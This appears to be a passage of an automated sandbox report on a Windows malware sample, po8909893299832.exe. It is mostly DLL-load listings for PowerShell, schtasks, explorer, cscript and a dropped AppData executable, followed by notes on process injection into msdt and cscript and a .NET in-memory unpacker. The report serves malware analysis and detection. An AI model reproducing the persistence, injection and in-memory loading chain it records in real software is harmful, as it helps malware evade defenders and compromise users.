Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.cloudstore.schema.shell.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: workfoldersshell.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: wininet.dll
Source: C:\Windows\explorer.exe	Section loaded: aepic.dll
Source: C:\Windows\explorer.exe	Section loaded: twinapi.dll
Source: C:\Windows\explorer.exe	Section loaded: userenv.dll
Source: C:\Windows\explorer.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\explorer.exe	Section loaded: powrprof.dll
Source: C:\Windows\explorer.exe	Section loaded: ntmarta.dll
Source: C:\Windows\explorer.exe	Section loaded: cryptsp.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: dxgi.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: propsys.dll
Source: C:\Windows\explorer.exe	Section loaded: coremessaging.dll
Source: C:\Windows\explorer.exe	Section loaded: urlmon.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\explorer.exe	Section loaded: wininet.dll
Source: C:\Windows\explorer.exe	Section loaded: uxtheme.dll
Source: C:\Windows\explorer.exe	Section loaded: dwmapi.dll
Source: C:\Windows\explorer.exe	Section loaded: sspicli.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: wldp.dll
Source: C:\Windows\explorer.exe	Section loaded: iertutil.dll
Source: C:\Windows\explorer.exe	Section loaded: srvcli.dll
Source: C:\Windows\explorer.exe	Section loaded: netutils.dll
Source: C:\Windows\explorer.exe	Section loaded: umpdc.dll
Source: C:\Windows\explorer.exe	Section loaded: ninput.dll
Source: C:\Windows\explorer.exe	Section loaded: appresolver.dll
Source: C:\Windows\explorer.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\explorer.exe	Section loaded: slc.dll
Source: C:\Windows\explorer.exe	Section loaded: sppc.dll
Source: C:\Windows\explorer.exe	Section loaded: profapi.dll
Source: C:\Windows\explorer.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\explorer.exe	Section loaded: starttiledata.dll
Source: C:\Windows\explorer.exe	Section loaded: idstore.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\explorer.exe	Section loaded: wlidprov.dll
Source: C:\Windows\explorer.exe	Section loaded: samcli.dll
Source: C:\Windows\explorer.exe	Section loaded: usermgrcli.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.applicationmodel.dll
Source: C:\Windows\explorer.exe	Section loaded: usermgrproxy.dll
Source: C:\Windows\explorer.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\explorer.exe	Section loaded: policymanager.dll
Source: C:\Windows\explorer.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\explorer.exe	Section loaded: winsta.dll
Source: C:\Windows\explorer.exe	Section loaded: sndvolsso.dll
Source: C:\Windows\explorer.exe	Section loaded: mmdevapi.dll
Source: C:\Windows\explorer.exe	Section loaded: devobj.dll
Source: C:\Windows\explorer.exe	Section loaded: oleacc.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.staterepositoryclient.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.cloudstore.dll
Source: C:\Windows\explorer.exe	Section loaded: wintypes.dll
Source: C:\Windows\explorer.exe	Section loaded: textshaping.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.ui.dll
Source: C:\Windows\explorer.exe	Section loaded: windowmanagementapi.dll
Source: C:\Windows\explorer.exe	Section loaded: textinputframework.dll
Source: C:\Windows\explorer.exe	Section loaded: inputhost.dll
Source: C:\Windows\explorer.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\explorer.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\explorer.exe	Section loaded: windowscodecs.dll
Source: C:\Windows\explorer.exe	Section loaded: appextension.dll
Source: C:\Windows\explorer.exe	Section loaded: dcomp.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.cloudstore.schema.shell.dll
Source: C:\Windows\explorer.exe	Section loaded: d3d11.dll
Source: C:\Windows\explorer.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\explorer.exe	Section loaded: d3d10warp.dll
Source: C:\Windows\explorer.exe	Section loaded: dxcore.dll
Source: C:\Windows\explorer.exe	Section loaded: d2d1.dll
Source: C:\Windows\explorer.exe	Section loaded: dwrite.dll
Source: C:\Windows\explorer.exe	Section loaded: xmllite.dll
Source: C:\Windows\explorer.exe	Section loaded: cldapi.dll
Source: C:\Windows\explorer.exe	Section loaded: fltlib.dll
Source: C:\Windows\explorer.exe	Section loaded: dataexchange.dll
Source: C:\Windows\explorer.exe	Section loaded: apphelp.dll
Source: C:\Windows\explorer.exe	Section loaded: tiledatarepository.dll
Source: C:\Windows\explorer.exe	Section loaded: staterepository.core.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.staterepository.dll
Source: C:\Windows\explorer.exe	Section loaded: explorerframe.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.staterepositorycore.dll
Source: C:\Windows\explorer.exe	Section loaded: mrmcorer.dll
Source: C:\Windows\explorer.exe	Section loaded: languageoverlayutil.dll
Source: C:\Windows\explorer.exe	Section loaded: bcp47mrm.dll
Source: C:\Windows\explorer.exe	Section loaded: thumbcache.dll
Source: C:\Windows\explorer.exe	Section loaded: edputil.dll
Source: C:\Windows\explorer.exe	Section loaded: twinui.pcshell.dll
Source: C:\Windows\explorer.exe	Section loaded: wkscli.dll
Source: C:\Windows\explorer.exe	Section loaded: wincorlib.dll
Source: C:\Windows\explorer.exe	Section loaded: cdp.dll
Source: C:\Windows\explorer.exe	Section loaded: dsreg.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.immersiveshell.serviceprovider.dll
Source: C:\Windows\explorer.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\explorer.exe	Section loaded: photometadatahandler.dll
Source: C:\Windows\explorer.exe	Section loaded: ntshrui.dll
Source: C:\Windows\explorer.exe	Section loaded: cscapi.dll
Source: C:\Windows\explorer.exe	Section loaded: linkinfo.dll
Source: C:\Windows\explorer.exe	Section loaded: ehstorshell.dll
Source: C:\Windows\explorer.exe	Section loaded: cscui.dll
Source: C:\Windows\explorer.exe	Section loaded: provsvc.dll
Source: C:\Windows\explorer.exe	Section loaded: twinui.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: twinui.dll
Source: C:\Windows\explorer.exe	Section loaded: pdh.dll
Source: C:\Windows\explorer.exe	Section loaded: applicationframe.dll
Source: C:\Windows\explorer.exe	Section loaded: rmclient.dll
Source: C:\Windows\explorer.exe	Section loaded: holographicextensions.dll
Source: C:\Windows\explorer.exe	Section loaded: virtualmonitormanager.dll
Source: C:\Windows\explorer.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.ui.immersive.dll
Source: C:\Windows\explorer.exe	Section loaded: abovelockapphost.dll
Source: C:\Windows\explorer.exe	Section loaded: npsm.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.shell.bluelightreduction.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.web.dll
Source: C:\Windows\explorer.exe	Section loaded: mscms.dll
Source: C:\Windows\explorer.exe	Section loaded: coloradapterclient.dll
Source: C:\Windows\explorer.exe	Section loaded: cryptbase.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.internal.signals.dll
Source: C:\Windows\explorer.exe	Section loaded: tdh.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.staterepositorybroker.dll
Source: C:\Windows\explorer.exe	Section loaded: mfplat.dll
Source: C:\Windows\explorer.exe	Section loaded: rtworkq.dll
Source: C:\Windows\explorer.exe	Section loaded: taskflowdataengine.dll
Source: C:\Windows\explorer.exe	Section loaded: structuredquery.dll
Source: C:\Windows\explorer.exe	Section loaded: actxprxy.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.security.authentication.web.core.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.data.activities.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.system.launcher.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.shell.servicehostbuilder.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.internal.ui.shell.windowtabmanager.dll
Source: C:\Windows\explorer.exe	Section loaded: notificationcontrollerps.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.devices.enumeration.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.globalization.dll
Source: C:\Windows\explorer.exe	Section loaded: icu.dll
Source: C:\Windows\explorer.exe	Section loaded: mswb7.dll
Source: C:\Windows\explorer.exe	Section loaded: devdispitemprovider.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.networking.connectivity.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.ui.core.textinput.dll
Source: C:\Windows\explorer.exe	Section loaded: windowsudk.shellcommon.dll
Source: C:\Windows\explorer.exe	Section loaded: dictationmanager.dll
Source: C:\Windows\explorer.exe	Section loaded: uianimation.dll
Source: C:\Windows\explorer.exe	Section loaded: npmproxy.dll
Source: C:\Windows\explorer.exe	Section loaded: taskschd.dll
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\explorer.exe	Section loaded: winhttp.dll
Source: C:\Windows\explorer.exe	Section loaded: mswsock.dll
Source: C:\Windows\explorer.exe	Section loaded: winnsi.dll
Source: C:\Windows\explorer.exe	Section loaded: dpapi.dll
Source: C:\Windows\explorer.exe	Section loaded: msasn1.dll
Source: C:\Windows\explorer.exe	Section loaded: rsaenh.dll
Source: C:\Windows\explorer.exe	Section loaded: dnsapi.dll
Source: C:\Windows\explorer.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\explorer.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\explorer.exe	Section loaded: schannel.dll
Source: C:\Windows\explorer.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\explorer.exe	Section loaded: ntasn1.dll
Source: C:\Windows\explorer.exe	Section loaded: ncrypt.dll
Source: C:\Windows\explorer.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\explorer.exe	Section loaded: gpapi.dll
Source: C:\Windows\explorer.exe	Section loaded: pcshellcommonproxystub.dll
Source: C:\Windows\explorer.exe	Section loaded: cryptngc.dll
Source: C:\Windows\explorer.exe	Section loaded: cflapi.dll
Source: C:\Windows\explorer.exe	Section loaded: shellcommoncommonproxystub.dll
Source: C:\Windows\explorer.exe	Section loaded: execmodelproxy.dll
Source: C:\Windows\explorer.exe	Section loaded: daxexec.dll
Source: C:\Windows\explorer.exe	Section loaded: container.dll
Source: C:\Windows\explorer.exe	Section loaded: samlib.dll
Source: C:\Windows\explorer.exe	Section loaded: capabilityaccessmanagerclient.dll
Source: C:\Windows\explorer.exe	Section loaded: stobject.dll
Source: C:\Windows\explorer.exe	Section loaded: wmiclnt.dll
Source: C:\Windows\explorer.exe	Section loaded: batmeter.dll
Source: C:\Windows\explorer.exe	Section loaded: inputswitch.dll
Source: C:\Windows\explorer.exe	Section loaded: prnfldr.dll
Source: C:\Windows\explorer.exe	Section loaded: es.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.ui.shell.dll
Source: C:\Windows\explorer.exe	Section loaded: dxp.dll
Source: C:\Windows\explorer.exe	Section loaded: shdocvw.dll
Source: C:\Windows\explorer.exe	Section loaded: syncreg.dll
Source: C:\Windows\explorer.exe	Section loaded: atlthunk.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.fileexplorer.common.dll
Source: C:\Windows\explorer.exe	Section loaded: actioncenter.dll
Source: C:\Windows\explorer.exe	Section loaded: wevtapi.dll
Source: C:\Windows\explorer.exe	Section loaded: wscinterop.dll
Source: C:\Windows\explorer.exe	Section loaded: wscapi.dll
Source: C:\Windows\explorer.exe	Section loaded: audioses.dll
Source: C:\Windows\explorer.exe	Section loaded: pnidui.dll
Source: C:\Windows\explorer.exe	Section loaded: mobilenetworking.dll
Source: C:\Windows\explorer.exe	Section loaded: netprofm.dll
Source: C:\Windows\explorer.exe	Section loaded: networkuxbroker.dll
Source: C:\Windows\explorer.exe	Section loaded: werconcpl.dll
Source: C:\Windows\explorer.exe	Section loaded: framedynos.dll
Source: C:\Windows\explorer.exe	Section loaded: wer.dll
Source: C:\Windows\explorer.exe	Section loaded: hcproviders.dll
Source: C:\Windows\explorer.exe	Section loaded: wpnclient.dll
Source: C:\Windows\explorer.exe	Section loaded: ethernetmediamanager.dll
Source: C:\Windows\explorer.exe	Section loaded: wlanapi.dll
Source: C:\Windows\explorer.exe	Section loaded: ncsi.dll
Source: C:\Windows\explorer.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\explorer.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\explorer.exe	Section loaded: dusmapi.dll
Source: C:\Windows\explorer.exe	Section loaded: sxs.dll
Source: C:\Windows\explorer.exe	Section loaded: wpdshserviceobj.dll
Source: C:\Windows\explorer.exe	Section loaded: portabledevicetypes.dll
Source: C:\Windows\explorer.exe	Section loaded: portabledeviceapi.dll
Source: C:\Windows\explorer.exe	Section loaded: cscobj.dll
Source: C:\Windows\explorer.exe	Section loaded: srchadmin.dll
Source: C:\Windows\explorer.exe	Section loaded: storageusage.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.search.dll
Source: C:\Windows\explorer.exe	Section loaded: fhcfg.dll
Source: C:\Windows\explorer.exe	Section loaded: efsutil.dll
Source: C:\Windows\explorer.exe	Section loaded: mpr.dll
Source: C:\Windows\explorer.exe	Section loaded: netapi32.dll
Source: C:\Windows\explorer.exe	Section loaded: dsrole.dll
Source: C:\Windows\explorer.exe	Section loaded: synccenter.dll
Source: C:\Windows\explorer.exe	Section loaded: imapi2.dll
Source: C:\Windows\explorer.exe	Section loaded: bluetoothapis.dll
Source: C:\Windows\explorer.exe	Section loaded: workfoldersshell.dll
Source: C:\Windows\explorer.exe	Section loaded: bluetoothapis.dll
Source: C:\Windows\explorer.exe	Section loaded: bluetoothapis.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.internal.system.userprofile.dll
Source: C:\Windows\explorer.exe	Section loaded: cloudexperiencehostbroker.dll
Source: C:\Windows\explorer.exe	Section loaded: credui.dll
Source: C:\Windows\explorer.exe	Section loaded: dui70.dll
Source: C:\Windows\explorer.exe	Section loaded: wdscore.dll
Source: C:\Windows\explorer.exe	Section loaded: dbghelp.dll
Source: C:\Windows\explorer.exe	Section loaded: dbgcore.dll
Source: C:\Windows\explorer.exe	Section loaded: ieproxy.dll
Source: C:\Windows\explorer.exe	Section loaded: settingsync.dll
Source: C:\Windows\explorer.exe	Section loaded: settingsynccore.dll
Source: C:\Windows\explorer.exe	Section loaded: wpnapps.dll
Source: C:\Windows\explorer.exe	Section loaded: msxml6.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.ui.xaml.dll
Source: C:\Windows\explorer.exe	Section loaded: windowsinternal.composableshell.desktophosting.dll
Source: C:\Windows\explorer.exe	Section loaded: uiamanager.dll
Source: C:\Windows\explorer.exe	Section loaded: mfsrcsnk.dll

Source: C:\Users\user\Desktop\po8909893299832.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\po8909893299832.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: po8909893299832.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: po8909893299832.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: po8909893299832.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: cscript.pdbUGP source: InXlDTKncKkCk.exe, 00000010.00000002.1496875331.0000000000928000.00000004.00000020.00020000.00000000.sdmp, InXlDTKncKkCk.exe, 00000010.00000002.1501823964.0000000001260000.00000040.10000000.00040000.00000000.sdmp, cscript.exe, 00000012.00000002.3853793986.00000000002D0000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: hovp.pdbSHA256 source: po8909893299832.exe, InXlDTKncKkCk.exe.0.dr
Source:	Binary string: msdt.pdbGCTL source: po8909893299832.exe, 00000009.00000002.1499697457.00000000035E0000.00000040.10000000.00040000.00000000.sdmp, msdt.exe, 00000011.00000002.1502169284.00000000001B0000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: hovp.pdb source: po8909893299832.exe, InXlDTKncKkCk.exe.0.dr
Source:	Binary string: wntdll.pdbUGP source: po8909893299832.exe, 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000011.00000002.1503188875.000000000499E000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000011.00000002.1503188875.0000000004800000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000011.00000003.1496732128.00000000044A5000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000011.00000003.1500403493.0000000004654000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000012.00000003.1498745033.0000000004CBF000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000012.00000002.3864619593.0000000004E70000.00000040.00001000.00020000.00000000.sdmp, cscript.exe, 00000012.00000003.1496170490.0000000004B0D000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000012.00000002.3864619593.000000000500E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: po8909893299832.exe, po8909893299832.exe, 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000011.00000002.1503188875.000000000499E000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000011.00000002.1503188875.0000000004800000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000011.00000003.1496732128.00000000044A5000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000011.00000003.1500403493.0000000004654000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000012.00000003.1498745033.0000000004CBF000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000012.00000002.3864619593.0000000004E70000.00000040.00001000.00020000.00000000.sdmp, cscript.exe, 00000012.00000003.1496170490.0000000004B0D000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000012.00000002.3864619593.000000000500E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: msdt.pdb source: po8909893299832.exe, 00000009.00000002.1499697457.00000000035E0000.00000040.10000000.00040000.00000000.sdmp, msdt.exe, 00000011.00000002.1502169284.00000000001B0000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: cscript.pdb source: InXlDTKncKkCk.exe, 00000010.00000002.1496875331.0000000000928000.00000004.00000020.00020000.00000000.sdmp, InXlDTKncKkCk.exe, 00000010.00000002.1501823964.0000000001260000.00000040.10000000.00040000.00000000.sdmp, cscript.exe, 00000012.00000002.3853793986.00000000002D0000.00000040.80000000.00040000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: po8909893299832.exe, MsgBx.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
